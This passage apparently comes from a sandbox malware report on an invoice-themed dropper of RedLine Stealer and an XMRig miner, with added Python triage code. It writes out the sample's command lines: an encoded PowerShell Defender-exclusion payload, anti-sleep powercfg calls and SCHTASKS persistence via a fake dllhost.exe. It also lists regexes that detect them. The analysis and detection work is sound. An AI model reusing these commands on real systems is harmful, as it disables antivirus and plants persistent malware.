                                Data Ascii: t" src="https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_textarea-autosi-9e0349-5003aaeba352.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src=


                                Target ID:0
                                Start time:19:45:30
                                Start date:04/09/2024
                                Path:C:\Users\user\Desktop\invoice.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\invoice.exe"
                                Imagebase:0x200000
                                File size:1'262'619 bytes
                                MD5 hash:6AF6A7FAC1197A9B12B28C0E4DB8C18A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:1
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat" "
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c dir /b "*.exe"
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe
                                Wow64 process (32bit):true
                                Commandline:"4usfliof.exe"
                                Imagebase:0x990000
                                File size:3'555'328 bytes
                                MD5 hash:B154114F2D13496DC9630CAC4E707672
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.1664492512.0000000001272000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.1834530899.00000000009BD000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 83%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:5
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe
                                Wow64 process (32bit):true
                                Commandline:"yee9mbi69cm7.exe"
                                Imagebase:0x760000
                                File size:6'004'224 bytes
                                MD5 hash:D076D83093CF70D43AE8202CB9603D0D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 88%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:6
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                Imagebase:0x1d0000
                                File size:45'984 bytes
                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2888940061.00000000005A2000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:false

                                Target ID:9
                                Start time:19:45:32
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 288
                                Imagebase:0x3c0000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:10
                                Start time:19:45:34
                                Start date:04/09/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                Imagebase:0x300000
                                File size:45'984 bytes
                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:11
                                Start time:19:45:34
                                Start date:04/09/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                Imagebase:0xfe0000
                                File size:45'984 bytes
                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_MinerDownloader_3, Description: Yara detected Generic MinerDownloader, Source: 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:12
                                Start time:19:45:34
                                Start date:04/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:14
                                Start time:19:45:35
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 224
                                Imagebase:0x3c0000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:15
                                Start time:19:45:37
                                Start date:04/09/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                Imagebase:0x3b0000
                                File size:103'528 bytes
                                MD5 hash:89D41E1CF478A3D3C2C701A27A5692B2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_MinerDownloader_3, Description: Yara detected Generic MinerDownloader, Source: 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_MinerDownloader_3, Description: Yara detected Generic MinerDownloader, Source: 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Has exited:true

                                Target ID:16
                                Start time:19:45:39
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:17
                                Start time:19:45:39
                                Start date:04/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:18
                                Start time:19:45:39
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A"
                                Imagebase:0x580000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true
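The cmd.exe and powershell.exe command lines in Target IDs 16 and 18 above carry an -EncodedCommand payload padded with random PowerShell block comments, followed by powercfg calls that stop the host from sleeping. The following is an added triage example, not part of the Joe Sandbox report and not code from the sample: it decodes the UTF-16LE Base64 argument, removes the <# ... #> comments that are there to break string signatures, and flags the Defender exclusion and the anti-sleep powercfg switches. The command line is copied from Target ID 16; the second, benign input is constructed for contrast.

```python
"""Decode an -EncodedCommand argument and flag Defender / power tampering.

Added example; the sample command line is copied from the report, the
detection patterns are the author's own and cover only switches they know.
"""
import base64
import re

# Copied from the Target ID 16 command line in the report.
SAMPLE_CMDLINE = (
    '"cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A"'
    " & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0"
    " & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0"
    " & powercfg /hibernate off"
)
# Constructed benign line used as a negative control.
BENIGN_CMDLINE = 'powershell -Command "Get-Date"'

# powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so every prefix is matched, longest first.
_ENC_SWITCH = "|".join(re.escape("encodedcommand"[:n]) for n in range(14, 0, -1)) + "|ec"
_ENC_RE = re.compile(r'(?<![\w-])-(?:' + _ENC_SWITCH + r')\s+"?([A-Za-z0-9+/=]{8,})"?', re.I)

# <# ... #> block comments carry no code; the sample inserts random ones
# between tokens so that a naive "Add-MpPreference -ExclusionPath" string fails.
_BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.S)

# Add-/Set-MpPreference with an exclusion or a protection-off switch.
_DEFENDER_RE = re.compile(
    r"\b(?:add|set)-mppreference\b.*?-(?:exclusion(?:path|process|extension|ipaddress)"
    r"|disable(?:realtimemonitoring|ioavprotection|behaviormonitoring|intrusionpreventionsystem))",
    re.I,
)

# powercfg invocations that zero the sleep/hibernate timeouts or disable hibernation;
# a miner uses these so the host keeps running. [^&]*? stays inside one cmd.exe segment.
_POWERCFG_RE = re.compile(
    r"\bpowercfg\b[^&]*?(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b"
    r"|\bpowercfg\b\s+/hibernate\s+off\b",
    re.I,
)


def decode_encoded_command(token: str):
    """Return the UTF-16LE text behind an -EncodedCommand token, or None if it is not one."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def normalize_ps(script: str) -> str:
    """Drop block comments and collapse whitespace so the real tokens are adjacent."""
    return " ".join(_BLOCK_COMMENT_RE.sub(" ", script).split())


def triage_cmdline(cmdline: str) -> dict:
    """Decode every encoded payload on the line and report what it does."""
    decoded = []
    for match in _ENC_RE.finditer(cmdline):
        text = decode_encoded_command(match.group(1))
        if text is not None:
            decoded.append(normalize_ps(text))
    visible = normalize_ps(cmdline)
    to_scan = [visible] + decoded
    return {
        "decoded": decoded,
        "defender_tamper": any(_DEFENDER_RE.search(s) for s in to_scan),
        "powercfg_antisleep": bool(_POWERCFG_RE.search(visible)),
    }


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(triage_cmdline(line))
```

Run against the report's line, the decoded payload is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force: the user profile and the whole system drive are excluded from Defender scanning before the miner and stealer are dropped. Matching on the decoded and comment-stripped text rather than on the raw argument is what makes the Sigma rule named in the overview ("Powershell Base64 Encoded MpPreference Cmdlet") reliable; the same decode step belongs in any process-creation telemetry pipeline that sees -EncodedCommand.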

                                Target ID:20
                                Start time:19:45:41
                                Start date:04/09/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff693ab0000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:21
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:22
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:23
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:24
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:25
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                Imagebase:0xfc0000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:26
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                Imagebase:0xfc0000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true
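Target IDs 21, 22, 25 and 26 above show the persistence step: two scheduled tasks, one every five minutes and one hourly, both pointing at C:\ProgramData\Dllhost\dllhost.exe, a copy that borrows the name of the Windows COM surrogate but lives outside C:\Windows. The following is an added example, not part of the Joe Sandbox report and not code from the sample: it parses SCHTASKS /CREATE command lines into their schedule, task name and action, and flags a system-binary name running from an unexpected directory, which is what the Sigma rules "Schedule system process" and "Files With System Process Name In Unsuspected Locations" in the overview describe. The two task lines are copied from Target IDs 25 and 26; the benign task and the list of system binary names are the author's own assumptions.

```python
"""Parse SCHTASKS /CREATE lines and flag masquerading system-binary actions.

Added example; the two suspicious inputs are copied from the report, the
benign input and the SYSTEM_BINARY_NAMES set are the author's assumptions.
"""
import ntpath
import re

SAMPLE_TASKS = [
    r'SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"',
    r'SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"',
]
# Constructed benign task used as a negative control.
BENIGN_TASK = r'SCHTASKS /CREATE /SC DAILY /TN "Backup" /TR "C:\Program Files\BackupTool\backup.exe"'

# Image names that legitimately live only under the Windows directory (assumed list).
SYSTEM_BINARY_NAMES = {
    "dllhost.exe", "svchost.exe", "conhost.exe", "csrss.exe", "lsass.exe", "smss.exe",
    "wininit.exe", "winlogon.exe", "services.exe", "explorer.exe", "taskhostw.exe",
    "rundll32.exe", "regsvcs.exe", "applaunch.exe",
}
SYSTEM_DIRS = ("c:\\windows\\",)

_CREATE_RE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.I)
# Each switch takes either a quoted value or a single bare token.
_ARG_RE = re.compile(r'/(SC|MO|TN|TR)\s+(?:"([^"]*)"|(\S+))', re.I)


def parse_schtasks_create(cmdline: str):
    """Return the /SC /MO /TN /TR values of a SCHTASKS /CREATE line, or None otherwise."""
    if not _CREATE_RE.search(cmdline):
        return None
    args = {}
    for m in _ARG_RE.finditer(cmdline):
        args[m.group(1).upper()] = m.group(2) if m.group(2) is not None else m.group(3)
    return args


def interval_minutes(args: dict):
    """Re-run interval in minutes for the schedules handled here, else None."""
    modifier = args.get("MO", "1")
    mo = int(modifier) if modifier.isdigit() else 1
    return {"MINUTE": mo, "HOURLY": 60 * mo, "DAILY": 1440 * mo}.get((args.get("SC") or "").upper())


def triage_schtasks(cmdline: str):
    """Describe a task-creation command line and list why it looks like persistence."""
    args = parse_schtasks_create(cmdline)
    if args is None:
        return None
    action = args.get("TR", "")
    # The action may carry arguments; keep the whole value when it is a bare .exe path.
    exe = action if action.lower().endswith(".exe") else (action.split() or [""])[0]
    name = ntpath.basename(exe).lower()
    directory = ntpath.dirname(exe).lower() + "\\"
    # A system-binary name outside C:\Windows (or with no directory at all) is masquerading.
    masquerade = name in SYSTEM_BINARY_NAMES and not directory.startswith(SYSTEM_DIRS)
    task = args.get("TN", "")
    task_leaf = ntpath.basename(task).lower()
    interval = interval_minutes(args)

    findings = []
    if masquerade:
        findings.append("system-binary name %s runs from %s" % (name, directory))
    if task_leaf + ".exe" in SYSTEM_BINARY_NAMES:
        findings.append("task name %r mimics a system process" % task)
    if interval is not None and interval <= 10:
        findings.append("re-launches every %d min (self-healing)" % interval)
    return {
        "task": task,
        "exe": exe,
        "interval_min": interval,
        "masquerading_system_binary": masquerade,
        "findings": findings,
    }


if __name__ == "__main__":
    for line in SAMPLE_TASKS + [BENIGN_TASK]:
        print(triage_schtasks(line))
```

The five-minute task is the part worth keeping an eye on during response: killing dllhost.exe without deleting both tasks (schtasks /Delete /TN "dllhost" /F and /TN "NvStray\NvStrayService_bk9049" /F) brings the miner back within minutes, and because the Defender exclusions from the earlier step cover C:\ProgramData, the relaunch is not scanned.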

                                No disassembly